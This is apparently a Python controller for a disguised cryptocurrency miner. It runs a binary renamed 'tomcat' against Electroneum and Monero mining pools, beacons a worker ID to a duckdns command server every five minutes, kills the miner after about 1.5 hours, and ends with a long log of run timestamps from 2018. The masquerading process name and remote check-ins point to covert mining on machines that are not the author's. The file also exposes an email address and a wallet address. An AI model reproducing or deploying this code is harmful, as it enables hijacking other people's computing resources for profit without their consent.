import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:14:04.063663
#2018-02-17 17:02:01.943974
#2018-02-17 18:49:06.685121
#2018-02-17 20:39:04.687881
#2018-02-17 22:26:06.271111
#2018-02-18 00:09:05.354236
#2018-02-18 02:01:05.236296
#2018-02-18 03:48:07.195181
#2018-02-18 05:35:08.171657
#2018-02-18 07:28:01.574166
#2018-02-18 09:14:07.246478
#2018-02-18 11:01:07.101347
#2018-02-18 12:47:01.902514
#2018-02-18 14:33:06.107671
#2018-02-18 16:23:01.342754
#2018-02-18 18:12:05.721844
#2018-02-18 19:57:05.542952
#2018-02-18 21:43:05.762123
#2018-02-18 23:32:01.538034
#2018-02-19 01:18:05.987414
#2018-02-19 03:06:05.679150
#2018-02-19 04:51:01.759226
#2018-02-19 06:37:05.866758
#2018-02-19 08:27:03.864117
#2018-02-19 10:16:06.565060
#2018-02-19 12:03:07.859702
#2018-02-19 13:50:08.146387
#2018-02-19 15:39:04.976462
#2018-02-19 17:25:05.865541
#2018-02-19 19:12:07.179658
#2018-02-19 21:01:01.601469
#2018-02-19 22:47:07.640838
#2018-02-20 00:30:08.765882
#2018-02-20 02:18:04.041282
#2018-02-20 04:10:09.371205
#2018-02-20 05:54:06.321269
#2018-02-20 07:40:07.664223
#2018-02-20 09:25:05.896736
#2018-02-20 11:09:04.743676
#2018-02-20 12:55:08.743763
#2018-02-20 14:39:09.022187
#2018-02-20 16:24:07.513708
#2018-02-20 18:12:01.367717
#2018-02-20 20:05:08.670840
#2018-02-20 21:52:08.187599
#2018-02-20 23:33:06.715845
#2018-02-21 01:18:06.497373
#2018-02-21 03:07:03.352004
#2018-02-21 04:56:01.737652
#2018-02-21 06:44:07.396186
#2018-02-21 08:32:08.132110
#2018-02-21 10:18:08.221672
#2018-02-21 12:07:01.989886
#2018-02-21 13:54:06.120572
#2018-02-21 15:40:09.061690
#2018-02-21 17:33:09.419680
#2018-02-21 19:19:07.596821
#2018-02-21 21:07:06.296732
#2018-02-21 22:53:06.552059
#2018-02-22 00:42:09.017762
#2018-02-22 02:29:01.496439
#2018-02-22 04:15:07.660221
#2018-02-22 06:02:05.224244
#2018-02-22 07:47:04.608151
#2018-02-22 09:36:01.933975
#2018-02-22 11:21:01.581253
#2018-02-22 13:07:06.510344
#2018-02-22 14:54:01.525238
#2018-02-22 16:39:05.733897
#2018-02-22 18:24:06.619946
#2018-02-22 20:16:01.952616
#2018-02-22 22:02:07.115083
#2018-02-22 23:48:06.169582
#2018-02-23 01:36:08.959086
#2018-02-23 03:23:03.987226
#2018-02-23 05:09:01.736010
#2018-02-23 06:53:05.496736
#2018-02-23 08:44:01.687895
#2018-02-23 11:03:08.005215
#2018-02-23 12:59:01.366150
#2018-02-23 14:45:11.206788
#2018-02-23 16:35:05.568274
#2018-02-23 18:21:01.608223
#2018-02-23 20:05:06.894512
#2018-02-23 21:49:05.732748
#2018-02-23 23:42:06.625194
#2018-02-24 01:32:01.364688
#2018-02-24 03:21:06.671194
#2018-02-24 05:05:06.086715
#2018-02-24 06:55:05.387942
#2018-02-24 08:44:01.463864
#2018-02-24 10:39:05.366764
#2018-02-24 12:25:06.893448
#2018-02-24 14:18:05.217831
#2018-02-24 16:04:05.482163
#2018-02-24 17:56:04.357424
#2018-02-24 19:43:07.322773
#2018-02-24 21:31:07.456461
#2018-02-25 00:16:05.562690
#2018-02-25 03:26:07.454587
#2018-02-25 07:20:06.628720